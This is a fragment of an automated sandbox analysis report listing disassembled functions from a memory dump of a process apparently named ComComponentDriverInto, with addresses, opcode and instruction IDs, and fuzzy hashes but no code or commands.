                                                            • Instruction Fuzzy Hash: 6DE09224F0D01A47F7B05784C8A03AD7266EB88700F1940B8D98ED33E2CD78AE05CB29
                                                            Function 00007FFD9BAA0B95 Relevance: .0, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                            • Instruction ID: d43890b40e2da7a934b2d2d856decd1e8b5be23f0a3ff70522a33d8ff4042f24
                                                            • Opcode Fuzzy Hash: 803acc49ec18d0d45acb6fb8da7e053dd471638d528cdc735f0ecc15faf31192
                                                            • Instruction Fuzzy Hash: 3CD0A73026954E4FDA00A77CC8598547BA0EB0B214FE610F1D009C7961C50949658700
                                                            Function 00007FFD9BAA06A5 Relevance: .0, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 75ff3a9e5439b36d679550c82c544546d1f302f36b3946c8c001b02f26fdcac2
                                                            • Instruction ID: 64c39e9645639a3142301825ede009cc0fb766319c0b0d7c46107333754b5fb6
                                                            • Opcode Fuzzy Hash: 75ff3a9e5439b36d679550c82c544546d1f302f36b3946c8c001b02f26fdcac2
                                                            • Instruction Fuzzy Hash: 64C01200F0B40F00E43133EA14620ACA2426BC4F14FD70032D10C800A1A8DD2289026A
                                                            Function 00007FFD9BAA12B0 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b5fd07f9e14441761168a6ff0457429a40298b1b5a959356a03bb1a68c1b724
                                                            • Instruction ID: 39854c1e6371d71f7330672ecc124ce2d464b4309c3b417f31e3120fbe61cbde
                                                            • Opcode Fuzzy Hash: 3b5fd07f9e14441761168a6ff0457429a40298b1b5a959356a03bb1a68c1b724
                                                            • Instruction Fuzzy Hash: 23C08C3051180C8FC948EB28C88491433E0FB09300BC20090E008C7170D259ECC1C780
                                                            Function 00007FFD9BAA41A9 Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83ae53d23e3d524b50eec2e88e2c58011cb70fba8b69a1fd4d1ef0a6416d539d
                                                            • Instruction ID: 175d2321aa51ea17953a7270c46a8142d73fa4dc63899ebd16350d9e0937116c
                                                            • Opcode Fuzzy Hash: 83ae53d23e3d524b50eec2e88e2c58011cb70fba8b69a1fd4d1ef0a6416d539d
                                                            • Instruction Fuzzy Hash: B7C04C01F2DC2A17F36A6654942167E14475F58B28F594274E11ECA7EECE5C6E0206CA
                                                            Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22c18b74dcd799a1d73eafb7afbd5628e56aef2e65ad0af76b591f55e6eafce0
                                                            • Instruction ID: 1777f45c348e41357c35488521a6e8d8a2ae9f3dde5037b3f49d5db96d64187b
                                                            • Opcode Fuzzy Hash: 22c18b74dcd799a1d73eafb7afbd5628e56aef2e65ad0af76b591f55e6eafce0
                                                            • Instruction Fuzzy Hash: B4B01200D5740F00E43433FA089207870816B44300FC60070D40D90091A8CD22981367

                                                            Non-executed Functions

                                                            Function 00007FFD9BAA09B0 Relevance: 5.2, Strings: 4, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000051.00000002.2626438662.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_81_2_7ffd9baa0000_ComComponentDriverInto.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 2012eee6701b8f2b3b5d19d4ae0088547fdd535eec8ab2517fb71e7b47b156d5
                                                            • Instruction ID: 418b4576977fcf1fa9ef1b61a93863909616c5d4dfb5d5b77f4e08d304a4124c
                                                            • Opcode Fuzzy Hash: 2012eee6701b8f2b3b5d19d4ae0088547fdd535eec8ab2517fb71e7b47b156d5
                                                            • Instruction Fuzzy Hash: C241DE17B0842745E239B3FD78229ED5B449FA923FB0847B7F56E8D0C74C082486C2E9